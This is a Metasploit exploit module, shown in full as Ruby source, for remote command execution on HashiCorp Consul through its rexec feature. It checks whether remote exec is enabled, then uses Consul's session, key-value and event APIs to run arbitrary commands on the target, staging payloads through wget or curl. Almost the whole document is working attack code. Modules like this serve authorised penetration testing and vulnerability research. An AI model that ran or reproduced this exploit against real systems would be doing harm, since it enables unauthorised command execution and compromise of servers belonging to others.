1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Hashicorp Consul Remote Command Execution via Rexec",
'Description' => %q{
This module exploits a feature of Hashicorp Consul named rexec.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
[ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
[ 'URL', 'https://github.com/torque59/Garfield' ]
],
'Platform' => 'linux',
'Targets' => [ [ 'Linux', {} ] ],
'Payload' => {},
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 11 2018'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path', '/']),
OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
Opt::RPORT(8500)
])
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "/v1/agent/self"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
begin
agent_info = JSON.parse(res.body)
if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
rescue JSON::ParserError
vprint_error 'Failed to parse JSON output.'
return CheckCode::Unknown
end
end
def execute_command(cmd, opts = {})
uri = target_uri.path
print_status('Creating session.')
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, 'v1/session/create'),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
})
if res and res.code == 200
begin
sess = JSON.parse(res.body)
print_status("Got rexec session ID #{sess['ID']}")
rescue JSON::ParseError
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
end
end
print_status("Setting command for rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
print_status("Triggering execution on rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
})
if res and not res.code == 200
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
begin
Timeout.timeout(datastore['TIMEOUT']) do
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
begin
data = JSON.parse(res.body)
break if data.include? 'out'
rescue JSON::ParseError
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
end
sleep 2
end
rescue Timeout::Error
# we catch this error so cleanup still happen afterwards
print_status("Timeout hit, error with payload ?")
end
print_status("Cleaning up rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
end
def exploit
execute_cmdstager()
end
end
|